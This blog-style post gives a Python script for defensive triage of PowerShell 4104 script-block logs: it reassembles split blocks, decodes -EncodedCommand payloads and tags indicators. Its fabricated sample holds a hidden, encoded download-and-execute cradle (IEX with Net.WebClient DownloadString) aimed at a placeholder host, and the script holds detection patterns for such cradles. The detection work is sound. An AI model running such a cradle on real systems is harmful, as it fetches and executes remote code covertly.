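Large script blocks are split across several 4104 records that share a ScriptBlockId, and encoded command lines hide the real payload, so a triage pass has to reassemble before it can judge. The following added example (not code from the original page) does that over constructed 4104 EventData records: it joins the parts in MessageNumber order, flags incomplete blocks, decodes any -EncodedCommand argument (Base64 of UTF-16LE) and tags each block with indicator labels of the example's own choosing. The event records, ScriptBlockIds and payload are fabricated for the example.

```python
import base64
import re
from collections import defaultdict

# Indicators a triage pass looks for in the reassembled text (and in any
# decoded -EncodedCommand payload). The labels are this example's own.
SUSPICIOUS_PATTERNS = {
    "encoded_command": re.compile(r"-(?:enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
}
ENCODED_ARG = re.compile(r"-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Constructed sample: EventData fields of three 4104 records. One script block
# was split into two records (MessageTotal=2) and arrives out of order, as
# happens when records are exported or filtered. The IDs are fabricated.
PAYLOAD = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a")'
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ScriptBlockId": "11111111-2222-3333-4444-555555555555", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": f"powershell.exe -nop -w hidden -enc {ENCODED}", "Path": ""},
    {"ScriptBlockId": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Users -Recurse | Measure-Object",
     "Path": "C:\\Scripts\\inventory.ps1"},
    {"ScriptBlockId": "11111111-2222-3333-4444-555555555555", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "Start-Process ", "Path": ""},
]


def reassemble_script_blocks(events):
    """Group 4104 records by ScriptBlockId and join the parts in MessageNumber order.

    Returns one dict per script block; `complete` is False when parts are
    missing (e.g. log rollover), so the text should not be trusted as whole.
    """
    parts, meta = defaultdict(dict), {}
    for ev in events:
        block_id = ev["ScriptBlockId"]
        parts[block_id][int(ev["MessageNumber"])] = ev["ScriptBlockText"]
        meta[block_id] = {"total": int(ev["MessageTotal"]),
                          "path": ev.get("Path") or "<no file: interactive or in-memory>"}
    blocks = []
    for block_id, chunks in parts.items():
        missing = [n for n in range(1, meta[block_id]["total"] + 1) if n not in chunks]
        blocks.append({
            "id": block_id,
            "path": meta[block_id]["path"],
            "text": "".join(chunks[n] for n in sorted(chunks)),
            "complete": not missing,
            "missing_parts": missing,
        })
    return blocks


def decode_encoded_command(text):
    """Decode a -EncodedCommand argument (Base64 of UTF-16LE) if one is present."""
    match = ENCODED_ARG.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Reassemble blocks, decode encoded payloads and tag each block with indicators."""
    findings = []
    for block in reassemble_script_blocks(events):
        decoded = decode_encoded_command(block["text"])
        haystack = block["text"] + ("\n" + decoded if decoded else "")
        indicators = sorted(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(haystack))
        findings.append({**block, "decoded_command": decoded, "indicators": indicators})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["id"], f["path"], "complete" if f["complete"] else "INCOMPLETE", f["indicators"])
        if f["decoded_command"]:
            print("  decoded:", f["decoded_command"])
```

The same ScriptBlockId also ties 4104 to any 4105/4106 start/stop records, and the HostApplication field of the 400/403 and 600 events in Windows PowerShell.evtx carries the launching command line, so an -EncodedCommand seen here should be cross-checked there for the session that ran it.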

Tools

-

Sources

This post is licensed under CC BY 4.0 by the author.